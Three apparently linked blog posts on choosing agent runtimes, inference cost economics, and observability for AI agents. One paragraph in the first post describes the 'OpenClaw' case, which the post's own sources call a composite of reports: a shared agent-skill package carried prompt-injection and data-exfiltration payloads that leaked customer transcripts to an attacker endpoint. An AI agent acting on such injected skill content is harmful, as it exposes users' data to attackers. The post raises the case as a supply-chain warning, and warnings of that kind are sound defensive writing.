Team A picked Anthropic Managed Agents. They wrote a system prompt, defined three tools, and pointed at a filesystem. Anthropic's harness handles memory windows, session persistence across days, sandbox execution, and automatic state compaction when context gets heavy. The team shipped in four days. Their bill for the first month was $62 — one agent, running 24/7, with spiky load. They didn't touch credentials beyond a single API key. They didn't touch sandbox isolation. They don't know what kernel their agent is running on.

Team B picked OpenAI's Agents SDK. They already had Modal running for batch jobs and didn't want another runtime. They wired up the SDK as the coordination layer, pointed at their existing Modal sandbox, brought their own secrets manager, and used their own OpenTelemetry setup. The SDK handled tool calling, multi-step planning, and the tricky parts of long-horizon tasks. They shipped in two weeks. Their bill is model tokens plus Modal compute — roughly flat with their previous LangChain setup, but with far less orchestration code.

Team C picked LangGraph with CrewAI patterns. They're a five-person platform team and they wanted every knob. They wrote the graph, the state store, the sandbox, the retry logic, the session logger, the credential vault. They shipped in eight weeks. Their infrastructure bill is lower per-agent-hour than either A or B. Their on-call volume is higher than both combined. When the CEO asked "why don't we just use managed?" they had to write a six-page doc about control-plane sovereignty.

All three agents work. All three teams made rational choices. The difference is where they chose to spend their complexity budget.

Notice the line keeps moving up the stack. Managed hides almost everything. Hybrid hides coordination only. DIY hides nothing. The question isn't which is "better" — it's which boundary matches your team's actual constraints.

What patterns are holding up in production?

Three patterns dominate real agent deployments right now, and they're the ones to design for.

Hub-and-spoke is running the show. A TrueFoundry survey of multi-agent systems found that 66.4% of production deployments use a hub-and-spoke topology: one orchestrator agent delegates to specialist sub-agents. It's not because peer-to-peer is worse in theory — it's because hub-and-spoke is the only pattern you can actually debug at 3 AM. The orchestrator becomes the single point of observation, the single point of retry, and the single point of blame. You pay a latency tax of roughly 2-5 seconds per delegation cycle, and the pattern visibly breaks around seven sub-agents — context windows blow up, coordination errors compound, and the orchestrator starts contradicting itself. Below seven, it's remarkably stable.

Context engineering has become a real discipline. Anthropic published an essay this week — Effective Context Engineering for AI Agents — that's worth reading in full. The core idea: you don't stuff everything into the context window; you engineer what goes in and when. Key techniques include just-in-time retrieval (load tool outputs only when needed), state compaction (summarize old turns when context gets heavy), and structured memory (separate short-term scratch from long-term persistence). The Managed Agents harness implements all of this invisibly. If you go DIY, you will re-invent it badly before you re-invent it well.

State is where everything fails first. Every production incident I've read about this cycle traces back to state management. Agents that forget what they were doing. Agents that remember too much and contradict earlier decisions. Agents that can't resume after a crash. The managed harnesses solve this by making state persistence a first-class primitive. The DIY stacks treat it as a Redis key, and that's where the cracks appear first.

Real outcomes from real teams

A fintech I talked to this week migrated a three-agent fraud-review workflow from LangGraph to Anthropic Managed Agents. Build time went from six weeks to four days. Their per-review cost went up by 40% — but their on-call volume dropped so hard they reassigned two engineers off the project. Net headcount savings paid for the managed premium five times over.

Block — one of the AAIF founding members — is pushing the opposite direction. They're betting on goose, their open-source agent framework, precisely because they don't want to be locked to any single vendor's runtime. The donation of goose to AAIF this week is a strategic move: commoditize the runtime, compete on data and distribution.

Then there's the failure case. The "OpenClaw" incident hit a community Discord this month — a popular shared skill package (think: npm for agent skills) was found to contain both data exfiltration and prompt-injection payloads. Teams that had blindly installed the skill to accelerate development ended up leaking customer support transcripts to an attacker-controlled endpoint. Nothing about the managed harnesses prevents this — the skill ran with the agent's permissions because that's what skills do. Framework capture creates a supply-chain attack surface that looks exactly like the npm/pip ecosystem circa 2018, and we haven't built the defenses yet.

A large enterprise platform team (Fortune 100, can't name them) found that after six months of agent rollouts, their AWS IAM directory had grown by 14,000 new roles — one per agent deployment, most over-permissioned, most never audited. Credential sprawl scales exponentially with agent count. Nobody budgets for this.

The trade-offs, argued as a debate

Let me argue this as three voices.

The Managed Advocate says: "Look, 90% of teams aren't going to out-engineer Anthropic or OpenAI on sandbox isolation, memory compaction, or session replay. You're paying $58/month to skip three months of work. Your engineers are worth more than that per hour. The flat $0.08/runtime-hour pricing is the most honest pricing in the industry — no surprises, no per-call gotchas. If you're under 50 agents and you're not a platform company, go managed."

The Hybrid Pragmatist says: "Vendor lock-in at the runtime layer is the worst kind of lock-in. If Anthropic deprecates a harness feature, your agents break silently. OpenAI's approach is sane — own the coordination, swap the runtime. I can run the same SDK against E2B today and Modal tomorrow. Portability is a real asset. The Managed pitch is compressed time-to-market; the cost is that when you want to leave, there's no door."

The DIY Purist says: "Both of you are ignoring governance. Managed Agents hides state, credentials, and audit trails behind the vendor's abstraction. My compliance officer needs to see what data crosses what boundary, and 'trust Anthropic' isn't an answer in regulated industries. LangGraph gives me the full graph, inspectable, in my VPC. Yes, I spent eight weeks building what Anthropic gives you in four days. But I can testify in court about what my agent did."

All three are right, and the framework that matches your context is the one that matches your constraints — regulatory, team size, latency budget, and exit strategy. Don't let a launch post pick for you.

One asymmetry worth naming: the managed platforms hide the work; they don't eliminate it. State management, credential lifecycles, access governance, and incident response still exist. You're just renting someone else's solution. That's often fine. It's never free.

What I'd do differently, having watched this week

The implementation insights that matter:

The biggest challenge nobody warns you about is that debugging an agent is fundamentally harder than debugging a service. A service has a request, a response, and a stack trace. An agent has a trajectory — a sequence of tool calls, intermediate reasoning, context windows that got compacted, and decisions that depend on prior context you no longer have. Managed platforms give you session replay; DIY stacks almost never do. If you go DIY, invest in trajectory logging before you invest in anything else.

The best practice that actually pays off: scope tool permissions per-agent, not per-organization. Every agent should have its own credential bundle with the minimum set of tool access it needs. The $14,000-IAM-roles story above is what happens when you don't do this. It's tedious to set up and pays for itself the first time an agent goes rogue.

The anti-pattern I see most often: building a "god agent" with 30 tools and hoping the model picks the right one. It won't. Above roughly 10-12 tools in a single agent, tool-selection accuracy collapses. Hub-and-spoke with specialist sub-agents isn't just an architectural preference — it's a workaround for a real model limitation.

The under-appreciated pattern: state compaction as a first-class operation. When your agent's context starts to exceed 50% of the window, have it summarize its own state and start fresh. Anthropic's Managed Agents does this automatically; in LangGraph you have to wire it yourself. Agents that never compact eventually drown in their own history.

Five takeaways to act on this week

Audit your agent permissions today. Pull the IAM roles, API keys, and tool scopes for every agent in production. If any agent has access to something it hasn't used in 30 days, remove it. You'll find at least one over-permissioned agent. Everyone does.
Decide your runtime posture explicitly. Write one paragraph: "We are a Managed / Hybrid / DIY shop because [reason]." If you can't finish the sentence, you're making the choice by accident, and accidental choices in this space get expensive fast.
Add trajectory logging before you add anything else. Every agent call, every tool invocation, every context compaction. Six months from now, your incident response will depend entirely on how good these logs are.
Treat shared skills like npm packages from 2018. Review the code. Pin versions. Run them in isolation first. The OpenClaw pattern will repeat — it's just a question of which community skill gets compromised next.
Don't architect for more than seven sub-agents in a hub-and-spoke. If you think you need more, you need another hub. Plan for hierarchical hubs from day one rather than discovering the seven-agent wall in production.

Deep dive resources worth your time

Anthropic: Managed Agents announcement and teardown — Why the $0.08/hr flat pricing matters, and what the harness actually includes. Read this first if you're evaluating Managed.
Anthropic: Effective Context Engineering for AI Agents — The essay that underpins the Managed Agents design decisions. Even if you go DIY, the patterns (just-in-time retrieval, state compaction, structured memory) are the real lesson.
TechCrunch: OpenAI Agents SDK April update — The clearest summary of the BYO-sandbox strategy and why OpenAI deliberately chose not to compete on runtime.
OpenAI: Agentic AI Foundation announcement — The political economy of the standards layer. Who signed, who didn't, and what that tells you about the next 18 months.
TrueFoundry: Multi-agent architecture patterns in production — The 66.4% hub-and-spoke number and the data behind it. Read for a grounded view of what actually ships.
Kai Wähner: Enterprise Agentic AI Landscape 2026 — The most honest treatment of vendor lock-in risk I've read this quarter.
MCP 2026 Roadmap — What standardizing tools looks like when the protocol goes to the Linux Foundation.

Sources and attribution

Anthropic, Managed Agents Public Beta (April 8, 2026)
Anthropic, Effective Context Engineering for AI Agents (April 2026)
TechCrunch, OpenAI Agents SDK enterprise update (April 15, 2026)
OpenAI, Agentic AI Foundation announcement (April 2026)
MCP, 2026 Roadmap (blog.modelcontextprotocol.io)
TrueFoundry, Multi-agent architecture in production survey (2026)
Kai Wähner, Enterprise Agentic AI Landscape 2026 (April 6, 2026)
Enterprise LLM API spend figures: referenced from market research cited in AAIF launch materials; 50% (2023) to 27% (2026).
OpenClaw incident: community reports (April 2026, composite of multiple Discord and mailing list incidents).

The agent platform wars aren't over. They just stopped being about who has the best model and started being about who owns the runtime. Pick your boundary deliberately — because this week, the vendors finally drew theirs.

The Inference Reckoning: From Training Buildout to Monetization

Anil Kurmi — Sun, 12 Apr 2026 01:52:16 +0000

$20 per million tokens. That was the price in early 2023. Today it's $0.40. A 50x collapse. Some providers hit 1,000x when you factor in quantized open-weight models on commodity GPUs.

And yet.

I talked to three platform engineering leads this month. Their AI inference bills are $2M, $4.7M, and $11M per month, respectively. All three expected to spend less than $500K. All three are panicking. The math that was supposed to save them -- cheaper tokens, better models, more efficient hardware -- is exactly the math that's destroying their budgets.

Here's the thread I want to pull: we spent five years obsessing over training FLOPS. Who has the biggest cluster. Who can afford the next GPT-scale run. Meanwhile, inference quietly ate 67% of total AI compute. By end of 2026, that number hits 70-80%. The $50B+ inference market is growing faster than training ever did.

We optimized for the wrong thing. And now the bill is due.

5-Minute Skim

If you're speed-reading, here's the shape of it:

Inference is 67% of AI compute. Training dominated the conversation. Inference dominates the bill.
Agentic AI is the multiplier nobody budgeted for. Multi-step agents generate 10-100x more tokens per interaction than a simple chat completion. Your cost model broke the moment you deployed your first agent.
The three-tier hybrid architecture is crystallizing. Cloud for training and experimentation. Private infrastructure for production inference. Edge for latency-critical workloads. Organizations treating all three as one problem are overspending on everything.
Mid-tier GPUs beat flagships for inference. L4 at $0.17/M tokens outperforms H100 at $0.30/M tokens for pure serving workloads. The H100 premium buys you nothing when you're decode-bound.
Disaggregated inference delivers 6.4x throughput. Separating prefill from decode -- physically, on different hardware -- is the single highest-leverage architectural change available right now.
FinOps went from niche to universal. 98% of organizations now actively manage AI spend, up from 31% two years ago. Cost-per-token is the new defining KPI.
Telecom is the hidden inference layer. NVIDIA AI Grids across 100,000+ edge locations are turning telco infrastructure into distributed inference networks. Comcast cut cost-per-token by 76%.

Now let me unpack why.

Why Did We Build the Wrong Infrastructure?

Because training was the visible problem.

When OpenAI trained GPT-4, the whole industry watched. Billions in GPU procurement. Custom InfiniBand fabrics. Liquid-cooled megawatt data centers. Every CTO saw those numbers and asked: "Do we need that too?"

Some did. Most didn't. But the infrastructure conversation stuck on training for half a decade.

Inference, meanwhile, was the quiet consumer. It doesn't need a dramatic cluster. It doesn't make headlines. It just runs. Every second. For every user. For every agent loop. Forever. And the bill compounds in a way training never does.

Training is capex. You rent the GPUs, run the job, get a checkpoint. Done.

Inference is pure opex. It runs 24/7. And agentic AI just poured gasoline on it.

A simple chatbot completion: ~500 tokens. An agentic workflow with tool use, reflection, and multi-step reasoning: 5,000-50,000 tokens. That's a 10-100x multiplier on every single interaction. Multiply that across millions of enterprise users, and you get the $11M monthly bill I mentioned earlier.

The 1,000x cost reduction got swallowed whole by the 100x usage explosion.

Where Does All the Money Actually Go?

Cloud waste hit 29% in 2026 -- a five-year high, per Flexera. That's not a coincidence. AI workload sprawl is the direct cause.

Here's what I see over and over: teams spin up GPU instances for inference, over-provision because they're afraid of latency spikes, then forget about them. Or they run H100s for workloads that would be cheaper on L4s. Or they batch nothing, cache nothing, and wonder why their per-token costs are 8x higher than the pricing page suggested.

The FinOps Foundation surveyed 1,192 respondents managing $83B+ in annual cloud spend. The findings are stark:

53% lack visibility into their AI costs
40% can't quantify the value AI delivers
39% struggle with equitable cost allocation across teams
76% of large enterprises spend over $5M/month on public cloud

That last number is the one that keeps CFOs up at night. And 64% of organizations have shifted their primary metric from raw cost to "value delivered to business units." Cost-per-token has replaced FLOPS as the number everyone argues about.

What Does the Right Architecture Look Like?

A three-tier hybrid. Every major analyst and infrastructure vendor converged on the same pattern this week -- Deloitte, NVIDIA, Nutanix, Bessemer, and the FinOps Foundation all independently described it.

Cloud tier is for training, fine-tuning, and experimentation. You want elastic burst capacity and access to the latest GPU generations (Blackwell, Rubin). 92.7% of enterprises are planning public cloud AI investments. That's fine. Just don't run your production inference there if it's steady-state.

Private tier is where production inference lives. On-premises or colocation. Predictable 24/7 workloads on hardware you own. The crossover point is clear: when cloud costs exceed 60-70% of equivalent on-prem, you move. At scale, that's a 40-60% cost reduction. Gartner says 40% of enterprises will adopt hybrid compute by end of 2026, up from 8%. And 86% of CIOs plan to repatriate some workloads from public cloud.

Edge tier is for anything that needs sub-10ms latency. Manufacturing floor vision systems. Autonomous vehicles. Real-time safety monitoring. This is where telecom infrastructure enters the picture -- and it changes the economics completely.

The key insight: training and inference have diverged in every dimension. They need different hardware, different deployment models, different networking, different cooling, different economics.

Organizations that treat training and inference as one workload will overspend on both.

Why Do Mid-Tier GPUs Beat Flagships for Inference?

This was the finding that completely rewired my thinking about GPU procurement.

H100: $0.30 per million tokens. L4: $0.17 per million tokens.

The L4 is 43% cheaper. For pure inference workloads, the H100's premium buys you almost nothing. GPUnex put it bluntly: "For pure inference workloads, the H100's premium price is often not justified."

Why? Because inference decode is memory-bandwidth-bound, not compute-bound. The H100's massive FP16 tensor core throughput sits idle during autoregressive token generation. You're paying for compute you aren't using.

The real optimization isn't picking the right GPU. It's stacking optimizations that compound:

Quantization (FP8/INT4): 4x memory reduction, minimal quality loss
Continuous batching: 2x throughput by filling GPU idle cycles
Speculative decoding: 2x faster generation using a small draft model

4x * 2x * 2x = 16x effective cost reduction versus naive deployment.

That 16x is the difference between "AI is too expensive for production" and "AI is our most profitable feature." And most teams haven't applied even one of these techniques.

What Is Disaggregated Inference and Why Does It Matter?

LLM inference looks like one operation. It's actually two operations with completely opposite hardware profiles fighting for the same GPU.

Prefill processes your entire prompt in parallel. It's compute-bound. GPU utilization hits 90-95%. It wants raw FLOPS.

Decode generates tokens one at a time. It's memory-bandwidth-bound. GPU utilization drops to 20-40%. It wants memory bandwidth, not compute.

When you run both on the same GPU, prefill starves decode of memory bandwidth, and decode wastes compute FLOPS. It's head-of-line blocking all over again.

The fix: physically separate them into independent Kubernetes services.

Results: up to 6.4x throughput improvement and 20x reduction in latency variance.

Meta, LinkedIn, Mistral, and Hugging Face are already running this in production with vLLM. KV cache transfers happen over RDMA (InfiniBand or RoCE) -- GPU-to-GPU without CPU involvement. NVIDIA's NIXL protocol handles the plumbing.

And it goes deeper. At GTC 2026, NVIDIA unveiled Attention-FFN Disaggregation (AFD). Instead of just separating prefill from decode, AFD separates attention operations (memory-bandwidth-bound, dynamic KV cache) from FFN operations (compute-bound, stateless). Attention runs on GPUs. FFN runs on NVIDIA's new LP30 chips -- 500MB on-chip SRAM, 1.2 PFLOPs FP8. That's a level of hardware specialization we haven't seen since the CPU/GPU split itself.

The Kubernetes-native stack making all of this practical is llm-d: vLLM as the model server, Kubernetes Inference Gateway for control plane and load balancing, and standard Kubernetes as the infrastructure controller. Version 0.5 benchmarks show ~3,100 tokens/second per B200 decode GPU, scaling to 50,000 output tokens/second on a 16x16 B200 topology. AWS is already shipping disaggregated inference on EKS and SageMaker HyperPod using llm-d.

How Does Telecom Become an Inference Network?

This is the part that most architects haven't caught up with yet.

There are roughly 100,000 distributed telecom data centers globally. They're already built. Already powered. Already networked. And most of them are dramatically underutilized.

NVIDIA AI Grids turns them into inference infrastructure.

The deployment model: operators activate existing wired edge sites as monetizable AI grids, running RTX PRO 6000 Blackwell Server Edition GPUs. Then they progressively integrate AI-RAN -- AI-enabled Radio Access Networks that serve dual duty as network infrastructure and inference compute.

This isn't theoretical. Production deployments are live:

Akamai activated 4,400+ edge locations with thousands of RTX PRO 6000 GPUs, building an inference cloud with intelligent routing that optimizes token economics across the fleet.

Spectrum is running 1,000+ edge data centers serving 500 million devices, delivering remote GPU rendering and media production at sub-10ms latency.

AT&T partnered with Cisco and NVIDIA for IoT grids focused on public safety and mission-critical inference with zero-trust edge security.

Comcast validated AI grids for conversational agents and gaming (GeForce NOW). Their key metric: 76% cost-per-token reduction compared to centralized cloud inference. That number is not a typo.

T-Mobile is piloting RTX PRO 6000 Blackwell for smart city, industrial, and retail edge inference -- cameras, robots, and agents running at the network edge.

The potential capacity across all these locations: over 100 GW for AI workloads over time. That's a staggering amount of distributed compute that already exists and just needs GPU hardware installed.

When Does On-Prem Actually Break Even?

This is the question every infrastructure team asks, and the answer is more nuanced than vendor marketing suggests.

Deloitte's crossover formula: when cloud costs exceed 60-70% of equivalent on-prem total cost of ownership, move to private infrastructure. That includes hardware depreciation, power, cooling, networking, and staff.

For inference specifically, the math favors on-prem faster than general compute because:

Utilization is predictable. Production inference runs 24/7 at relatively steady load. You're not paying for idle burst capacity.
Hardware requirements are modest. Inference racks draw 30-150 kW with air cooling. Training racks pull up to 1 MW and require liquid cooling. The infrastructure cost differential is massive.
Ethernet is sufficient. Inference doesn't need InfiniBand. Standard networking works fine. That's a 60-80% savings on network fabric alone.
Mid-tier GPUs work. You're buying L4s and L40Ss, not H100s. The capital outlay per rack is 3-5x lower.

But on-prem has real downsides. You lose elasticity. You carry capacity risk. You need GPU operations expertise that's extremely expensive to hire. And you're locked into a hardware generation for 3-5 years.

The pragmatic answer: run your baseline steady-state inference on-prem, burst to cloud during demand spikes, and push latency-critical workloads to edge. That's the three-tier hybrid in practice.

What Should You Actually Change This Quarter?

Measure cost-per-token, not GPU utilization. GPU utilization is a vanity metric. A GPU running at 90% utilization on unquantized, unbatched inference is wasting 80% of its potential throughput. Cost-per-token captures the full picture: hardware efficiency, software optimization, and business value in a single number. Nutanix CEO Rajiv Ramaswami called it "the defining unit of economics" for enterprise AI. He's right.

Stack your optimizations before buying hardware. Quantization + continuous batching + speculative decoding delivers a 16x cost reduction. That's the equivalent of buying 16x more GPUs. No procurement cycle required. No data center build-out. Just software changes to your serving stack.

Separate prefill from decode. If you're running any meaningful inference workload on Kubernetes, disaggregated serving is the single highest-ROI architectural change. vLLM supports it. llm-d orchestrates it. AWS ships it as a managed offering. The 6.4x throughput improvement is real and well-documented.

Audit your GPU selection. If you're running production inference on H100s, you're almost certainly overpaying. L4s at $0.17/M tokens versus H100s at $0.30/M tokens is a 43% cost difference that compounds across every token you serve. Reserve H100s and B200s for training and mixed workloads where compute density matters.

Talk to your FinOps team. If you don't have one, you need one. 98% of organizations now actively manage AI spend. The 2% who don't are the ones with $11M monthly surprises. VP-level engagement in FinOps correlates with 2-4x more influence on technology selection decisions. This is a board-level concern now, not an ops concern.

Deep Dive Resources

Resource	What You'll Learn	Link
Deloitte: AI Infrastructure Compute Strategy	Three-tier hybrid architecture, on-prem crossover analysis	deloitte.com
GPUnex: AI Inference Economics 2026	1,000x cost collapse analysis, GPU cost-per-token benchmarks	gpunex.com
SemiAnalysis: NVIDIA Inference Kingdom (GTC 2026)	AFD, LP30 chip, CMX storage tier deep dive	semianalysis.com
NVIDIA Blog: Telecom AI Grids	100K+ edge locations, operator deployments, AI-RAN	blogs.nvidia.com
State of FinOps 2026	98% AI cost management adoption, governance metrics	data.finops.org
llm-d Architecture Docs	Kubernetes-native disaggregated inference stack	llm-d.ai
Flexera 2026 State of the Cloud	29% waste rate, hybrid adoption trends	flexera.com
Bessemer: Five Frontiers for AI Infrastructure	Inference inflection, optimization startup landscape	bvp.com
AWS: Disaggregated Inference with llm-d	EKS and SageMaker HyperPod implementation guide	aws.amazon.com
UnifiedAIHub: AI Infrastructure Shifts 2026	Training-to-inference spending pivot analysis	unifiedaihub.com
Nutanix .NEXT: GPU as the New CPU	GPU virtualization thesis, AMD-Nutanix $250M partnership	siliconangle.com

Observability for Agentic Systems: Why Your Dashboards Are Lying to You

Anil Kurmi — Sun, 12 Apr 2026 01:50:55 +0000

Only 14% of organizations run observability on their LLM workloads. Up from 5% a year ago, sure. But still: 86% are flying blind.

Meanwhile, agents are making 6-27 tool calls per investigation. They loop. They branch. They backtrack when a tool returns garbage. They spawn sub-agents that spawn sub-agents. And every one of those interactions generates traces that look nothing like the HTTP request-response pairs your Grafana dashboards were designed to render.

We spent fifteen years perfecting observability for services that receive a request and return a response. Agents don't do that. And the gap between what we can see and what's actually happening is growing wider every week.

5-Minute Skim

If you're short on time, here's the shape:

Traditional distributed tracing captures the "what" but misses the "why." A span tree shows you an agent called a tool. It doesn't show you the reasoning chain that decided which tool to call, or why it retried three times before switching strategies.
OpenTelemetry's gen_ai.* semantic conventions are the emerging standard. They add model name, token counts, prompt content, and tool invocation metadata to spans. Red Hat demonstrated full W3C context propagation across MCP server boundaries.
Discord's Envelope pattern solves the actor-model tracing problem. By wrapping every message in an observable envelope, they trace fanout across millions of recipients with adaptive sampling -- 100% for single-recipient messages, 0.1% for 10K+ fanouts.
The Three Villains of observability data -- retention, sampling, and rollups -- hit agents harder than traditional services. Agent traces need 30-365 days of full-fidelity data, not the 7-14 day window most platforms default to. ClickHouse argues this is achievable at $0.0005/GB/month.
Auto-instrumentation gets you 60% of the way. The last 40% requires manual spans on reasoning steps, tool selection logic, and agent-to-agent delegation.

What Does an Agent Trace Actually Look Like?

Here's the problem in one picture.

A traditional microservice trace is a tree. Request comes in, fans out to three services, each returns, done. Clean. Predictable. Your Jaeger UI renders it beautifully.

An agent trace is something else entirely.

See the difference? The agent trace has cycles. The planner calls a tool, gets a result, reasons about it, calls another tool, reasons again, maybe decides the first result was wrong and retries. The trace isn't a tree -- it's a directed graph with loops. And the most important information isn't in the spans themselves. It's in the transitions between them: why did the agent choose tool B after tool A returned?

Traditional tracing captures I/O. Agent observability needs to capture intent.

Why Does Request-Response Tracing Break?

Three reasons. Each one is a paper cut. Together, they bleed out your entire observability strategy.

Reason one: agents are stateful across turns. A microservice handles a request and forgets. An agent accumulates context across a session that might last minutes or hours. The "trace" isn't one request -- it's a conversation. Your trace ID scoping, which assumes one ID per request-response cycle, can't represent this.

Reason two: tool calls cross trust boundaries. Red Hat's work on distributed tracing for agentic workflows showed that when an agent calls an MCP server, the trace context needs to propagate across a protocol boundary that wasn't designed for observability. W3C traceparent headers work for HTTP. MCP uses JSON-RPC over stdio or SSE. The context propagation mechanism is completely different.

Reason three: the cardinality explosion. Every prompt variation, every tool argument, every intermediate reasoning step is a unique attribute. Traditional services might have 50-100 distinct span attribute combinations. An agent interacting with 5 tools across 10 reasoning steps can generate thousands. Your metrics backend charges by series cardinality. Do the math.

How Did Discord Solve Tracing at Actor-Model Scale?

Discord processes billions of messages daily. Their architecture is built on Elixir's actor model -- millions of lightweight processes, each handling a slice of state. This is structurally similar to agentic systems: many autonomous units, communicating through messages, with no central orchestrator.

Their solution was the Envelope pattern.

Every message in the system gets wrapped in an Envelope -- a lightweight wrapper that carries trace context, sampling decisions, and causal metadata. The Envelope isn't the message. It's the observable skin around the message.

The key insight is fanout-aware sampling. When a message goes to one recipient, Discord samples at 100%. When a message fans out to 10,000+ recipients, they drop to 0.1%. The reasoning: a message that reaches 10,000 actors is structurally identical across all of them. You don't need 10,000 traces to understand what happened. You need ten.

This is directly applicable to agentic systems. When a coordinator agent delegates to 20 sub-agents running the same analysis on different data shards, you don't need to trace all 20. You need enough to detect the outlier -- the one that failed, the one that took 10x longer, the one that produced a different result.

The Envelope pattern gives you that. And it keeps your trace storage from growing linearly with your agent count.

What Are the Three Villains Destroying Your Agent Data?

ClickHouse published a sharp analysis this week that names three structural problems in how we store observability data. They're bad for traditional systems. They're catastrophic for agents.

Villain 1: Retention. Most observability platforms default to 7-14 days of trace retention. For request-response services, that's usually fine. You debug the incident, you move on. But agents learn. They build context over sessions. When an agent misbehaves on day 15, and the root cause was a subtle prompt drift that started on day 3, your data is already gone. Agent traces need 30-365 day retention. ClickHouse claims this is feasible at $0.0005/GB/month using tiered storage.

Villain 2: Sampling. Head-based sampling decides at trace start whether to keep or drop. For agents, this is a disaster. The most interesting traces -- the ones where the agent looped 14 times, switched strategies, and eventually produced a wrong answer -- are the long, expensive ones that sampling is biased to discard. You're systematically deleting your most valuable debugging data.

Tail-based sampling helps. It waits until the trace completes and keeps interesting ones. But "interesting" for agents means something different than "interesting" for HTTP services. Latency alone doesn't cut it. You need to sample based on reasoning depth, tool retry count, and output confidence -- metrics that only exist inside the agent's cognitive loop.

Villain 3: Rollups. Pre-aggregating raw data into summary metrics destroys dimensions. When you roll up "average agent latency per tool" into a 1-minute bucket, you lose the ability to answer "which specific reasoning chain caused the latency spike?" Agents need full-fidelity data because the debugging questions are always about specific chains of decisions, not averages.

The compounding effect is brutal. After retention deletes old data, sampling discards rare-but-critical traces, and rollups flatten what's left into averages, you have maybe 2-5% of the information you'd need to debug a complex agent failure. You just don't know which 2-5%.

How Do You Actually Instrument an Agent with OTel?

OpenTelemetry's gen_ai.* semantic conventions, which stabilized in early 2026, give you a vocabulary for agent telemetry. Here's the layered approach that Red Hat demonstrated and Uptrace documents.

Layer 1: Auto-instrumentation. Libraries like opentelemetry-instrumentation-openai and opentelemetry-instrumentation-anthropic hook into the SDK client and automatically emit spans for every LLM call. You get model name, token counts (input, output, total), latency, and error status without writing a single line of instrumentation code. This is your baseline. It takes five minutes to set up and covers the LLM-call layer.

Layer 2: Tool-call spans. Each tool invocation needs its own span, nested under the parent agent span. The span should carry gen_ai.tool.name, the input arguments (scrubbed of PII), the output summary, and the latency. Most MCP frameworks are starting to emit these automatically, but coverage is inconsistent. Red Hat's decorator pattern -- wrapping each tool handler in a span-emitting decorator -- is the pragmatic approach.

Layer 3: Reasoning spans. This is the manual layer. When the agent decides which tool to call, when it evaluates a result and decides to retry, when it synthesizes multiple tool outputs into a response -- these reasoning steps are invisible to auto-instrumentation. You need to manually create spans around them with attributes like agent.reasoning.step, agent.strategy.selected, and agent.confidence.score.

The ratio in practice is roughly 60% auto, 25% semi-auto (tool-level decorators), and 15% manual (reasoning instrumentation). That last 15% is where all the debugging value lives.

Context propagation across MCP boundaries deserves special attention. When your agent calls an MCP server running in a separate process, the trace context must survive the JSON-RPC boundary. Red Hat's approach: inject the W3C traceparent into the MCP request metadata, and extract it on the server side before creating the child span. It's the same pattern as HTTP header propagation, just over a different transport.

What Should a Unified Agent Dashboard Show?

Gravitee's work this week on AI observability for MCP tools points to what the dashboard of the future looks like. It's not just traces. It's traces plus cost plus reasoning quality in a single view.

Five panels, minimum:

Agent session timeline. Not a waterfall chart. A directed graph showing the actual flow of reasoning, including loops and backtracks. Each node is a step (LLM call, tool call, reasoning checkpoint). Color-coded by latency. Clickable to see the full prompt and response.

Token economics. Input tokens, output tokens, cache hits, cost per session. Broken down by model (because agents often use different models for different steps -- a cheap model for classification, an expensive one for synthesis). Gravitee shows this as a running cost ticker alongside the trace.

Tool reliability. Success rate, latency P50/P95/P99, and error classification for each tool the agent uses. When a tool starts returning errors, you want to see it before the agent's output quality degrades -- not after users report bad answers.

Reasoning depth distribution. A histogram of how many reasoning steps agents take per session. A sudden rightward shift means agents are struggling -- looping more, retrying more, working harder to produce answers. This is the leading indicator that something changed in your tools or data.

SLO burn rate. Conf42's Signal-to-Context Framework maps golden signals (latency, error rate, throughput, saturation) to agent-specific SLOs. The burn rate panel tells you whether you're consuming your error budget faster than expected. For agents, the SLO isn't just "respond within 2 seconds." It's "produce a correct, grounded answer within the token budget 99.5% of the time."

Auto vs. Manual Instrumentation: Where's the Line?

This is the trade-off that every team hits.

Auto-instrumentation is low effort and high coverage for the mechanical parts -- LLM calls, HTTP requests, database queries. You install the SDK, add three lines to your entrypoint, and you get spans. The problem: auto-instrumentation treats the agent like a black box. You see inputs and outputs. You don't see thinking.

Manual instrumentation is high effort and irreplaceable for the cognitive parts. Nobody except the developer who wrote the agent's reasoning loop knows where the critical decision points are. No library can automatically detect "this is where the agent decided to abandon strategy A and try strategy B."

The pragmatic approach: start with auto-instrumentation everywhere. Run it for two weeks. Look at the traces when debugging real incidents. Every time you find yourself saying "I can see what happened but I don't know why," that's where you add a manual span. Let production incidents guide your instrumentation investment.

Red Hat's hybrid auto+manual pattern formalizes this. Auto-instrumentation covers the infrastructure layer. Manual spans cover the cognitive layer. The two are connected through standard OTel parent-child span relationships.

One warning: don't over-instrument reasoning. I've seen teams add spans to every line of their agent's decision logic. The result is traces with 500+ spans per session that are harder to read than the code itself. Instrument decision boundaries, not decision internals.

Sampling vs. Full-Fidelity: Can You Afford to Keep Everything?

The standard observability answer is "sample aggressively, keep summaries." For agents, that answer is wrong.

Here's why. Agent failures are rare but high-impact. When an agent produces a hallucinated answer that a customer acts on, you need the full trace -- every prompt, every tool response, every reasoning step. If you sampled that trace away, you can't debug it. You can't even confirm it happened.

ClickHouse's argument: full-fidelity storage at $0.0005/GB/month makes the economics work. A typical agent session generates 10-50 KB of trace data. At 1 million sessions per day, that's 10-50 GB daily, or 300 GB-1.5 TB monthly. At their pricing, that's $0.15-$0.75/month for full-fidelity retention. The storage cost is a rounding error compared to the LLM inference cost.

But storage isn't the only cost. Query performance on full-fidelity data matters too. Column-oriented stores like ClickHouse handle this well because agent traces are highly compressible -- lots of repeated model names, tool names, and boilerplate prompt text. Compression ratios of 10-20x are common.

Discord's fanout sampling is the middle ground for systems that genuinely can't store everything. Sample 100% of novel traces (new tools, new agent versions, error cases). Sample proportionally for repetitive fanout. Never sample below a floor that guarantees statistical significance for anomaly detection.

The bottom line: if your agent traces cost less than 1% of your inference bill to store, keep them all. You'll thank yourself during the next postmortem.

What Should You Actually Do This Quarter?

Add gen_ai.* semantic conventions to your OTel configuration. Even if you're not ready for full agent observability, start collecting model name, token counts, and tool call metadata on every LLM interaction. The data is cheap to store and invaluable when you need it.

Extend your trace retention to 90 days for agent workloads. The 7-14 day default is designed for stateless request-response services. Agents accumulate behavioral drift over weeks. If your observability vendor can't do 90 days affordably, that's a signal to evaluate alternatives.

Instrument reasoning boundaries, not reasoning internals. Add manual spans at the five to ten decision points in your agent's logic -- tool selection, strategy switches, confidence thresholds, delegation to sub-agents. Skip the internal chain-of-thought details unless you're debugging a specific failure.

